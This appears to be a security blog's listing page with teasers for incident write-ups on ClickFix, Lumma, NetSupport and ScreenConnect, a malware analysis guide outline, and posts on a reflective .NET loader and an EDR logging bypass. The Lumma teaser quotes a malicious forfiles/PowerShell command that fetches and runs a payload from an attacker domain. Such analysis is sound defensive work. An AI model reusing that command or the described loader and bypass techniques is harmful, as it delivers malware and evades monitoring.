ReflectFix

ClickFix has been the hot topic for over a year now (see all the other ClickFix posts) and recently, FileFix has come out as well (Shout out to mr.d0x!). In the spirit of calling every social engineering malware delivery system a “"-Fix”, let me introduce you to “ReflectFix” - A reflective .Net loader that utilizes social engineering aspects to load a remote DLL via reflection loading. Much like ClickFix or FileFix, ReflectFix uses a social engineering page that copies a url to the victim’s clipboard and downloads a reflection based loader. When executed by the victim, this loader takes the last copied string out of the clipboard and downloads the contents to a byte array which is loaded and executed in memory.

Excerpts from a threat briefing on IRGC threat groups.

Ignore the TLP Amber, this is TLP Green.

Direct Link

ClickFix - The RAT that (almost) got away

Incident Overview

An initial alert came in as an incident on a protected host. This incident was given a score of 1.1/10 and the summary of the included events revolved around a detection of a known hash. One minute after this automated incident message, 4 high detections were created for the host. Three minutes after the first notification, a managed detection was sent, including comments from the EDR vendors’ managed response team.

ClickFix - An Overview

• Executive Summary
• Introduction
• Use and Popularization
• Malware Delivery Details
• Payload Functionality
• Detection Methods
• Remediation Tactics
• Supporting Data

Executive Summary

ClickFix is a malware distribution method that relies on social engineering tactics to trick victims into executing malicious commands via the Windows Run menu. This is done through a series of steps, starting with the impersonation of well-known identity verification solutions like Cloudflare or reCAPTCHA. Typically, a user will browse to a compromised domain that contains a JavaScript function that loads the “Fake Captcha” page. This fake page will be styled as a legitimate verification system, tricking the user into complying with the requested verification process. When the user clicks the “Verify” or similar checkbox, malicious code will be copied into the user’s clipboard. Additionally, a window will pop up, telling the user to press Windows key + R and Ctrl + V, pressing enter after the malicious code is copied. More often than not, the malicious code is an installer for a Remote Access Trojan (RAT) or an Infostealer.

Getting Started with Malware Analysis and Reverse Engineering

Contents

• Malware Analysis Workflow
• Threat Intelligence
  • Hashing
  • YARA
  • Resources
• Static Analysis
  • File Analysis
    • Strings
    • Headers
    • Imports/Exports
    • Tools
  • Code Analysis
    • Common Functions
    • Tools
• Dynamic Analysis
  • Network Monitoring
    • WireShark
    • INetSim
    • FrausDNS
    • PolarProxy
  • Process Monitoring
    • ProcessMonitor
  • Logging
    • PowerShell Logs
    • Sysmon
    • General Event Logs
  • API Calls
    • API Monitor
• File Structures
  • PE Files
  • NIM Binaries
  • Rust Binaries
    • Code
    • Decompilation
  • C Binaries
    • Code
    • Decompilation
  • .Net Assemblies
    • Code
    • Decompilation
  • Compiled Visual Basic
    • Code
    • Decompilation
  • Compiled PowerShell
• Further Research and Learning Materials

Malware Analysis Workflow

    +-------------------------------------+
    |        Malware Analysis Workflow    |
    +-------------------------------------+
                       |
                       v
         +-----------------------------+
         |     Threat Intelligence     |
         +-----------------------------+
         | - Hash Lookups (VT, HA)     |
         | - IP/Domain Reputation      |
         |   (AbuseIPDB, ThreatFox)    |
         | - Sample Pivoting (Any.run) |
         | - YARA/IoC Extraction       |
         +-----------------------------+
                       |
                       v
         +----------------------------+
         |      Static Analysis       |
         +----------------------------+
         | - File Analysis            | <-- Tools: PEStudio, DIE, HashMyFiles
         | - Code Analysis            |
         | - Disassembly              | <-- Tools: Ghidra, IDA Free
         +----------------------------+
                       |
                       v
         +----------------------------+
         |      Dynamic Analysis      |
         +----------------------------+
         | - Network Monitoring       | <-- Tools: Wireshark, INetSim
         | - Process Monitoring       | <-- Tools: ProcMon, ProcExp
         | - API Call Monitoring      | <-- Tools: API Monitor
         | - Logging                  | <-- Tools: Sysmon, PowerShell logs
         +----------------------------+
                       |
                       v
    +-------------------------------------+
    |  Debugging & Reverse Engineering    |
    +-------------------------------------+
    | - IDA                               | <-- Tools: IDA Pro, Ghidra
    | - x64dbg                            | <-- Tools: x64dbg, Scylla
    +-------------------------------------+

Threat Intelligence

Threat intelligence gathering is an important step in scoping the work that needs to be done during the analysis. Often, a sample has defining traits that can be serached for in public threat intel spaces like VirusTotal, Tria.ge, or any other sandboxing/intel platform. By searching for these traits, like hashes, filenames, networking indicators, etc., you can determine if a sample needs to be reversed, categorized as a variant, or simply documented as a known sample.

Bypass Details

This will be a quick post, but I was playing around with a couple of EDR bypass methods this week after getting some inspiration from a ClickFix incident that abused SSH ProxyCommand. I wanted to write an EDR logging bypass that used SSH to launch arbitrary commands. Improving on the method I saw in the incident. Unfortunately, I didn’t do that. However, I did write up a simple and compact method to bypass command line logging. It’s confirmed working with a major EDR product and likely works for all products (maybe, idk, I just have the one to test on).

ClickFix - freewebstatics

Incident Overview

The SOC was alerted to a Potentially Unwanted Program (PUP) execution on a host device. This PUP was named client32.exe, which additionally flagged as a file that may be imitating a system file. Investigation of this alert revealed a base file path of "C:\Users\%USER%\AppData\Roaming\VFrTdT\client32.exe". This file belongs to the NetSupport Remote Monitoring and Management (RMM) tool. It is commonly used by threat actors to gain control of victim devices.

ClickFix - Smartlifeshift

Incident Overview

ClickFix has been a persistent threat since its emergence in 2024. The SOC has seen and resolved alerts stemming from ClickFix on a weekly basis, with incidents heavily ramping up in 2025. Recently, there has been a troubling trend of added complexity to ClickFix events. This incident in particular utilizes stealth and persistence measures to deploy a Lumma payload after tricking users into executing a PowerShell command that serves as a loader for a separate malware dropper. This incident also demonstrates some obfuscation and session control measures. The loader uses a special User-Agent string to download the payload from the threat actor controlled infrastructure. Any attempt to connect to the server without proper headers fails. Despite these improvements, EDR was able to detect and prevent the initial download from completing.

LummaStealer

Brief write-up on LummaStealer events observed in managed environments

Initial Detection Events

Users download a Windows lnk file from a malicious site that contains an executable command to launch forfiles.exe (a LOLbin for executing commands) with a command line similar to "C:\Windows\System32\forfiles.exe" /p C:\ /m Use*s /c "powershell Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto". This command line works as follows:

ScreenConnect

Initial Detection Events

The alert came from a concierge security service for the download and execution of an actor controlled ScreenConnect RMM Tool. The process was not blocked by EDR. SOC investigation concluded that the user executed a malicious application that may have installed ScreenConnect for malicious access to the device.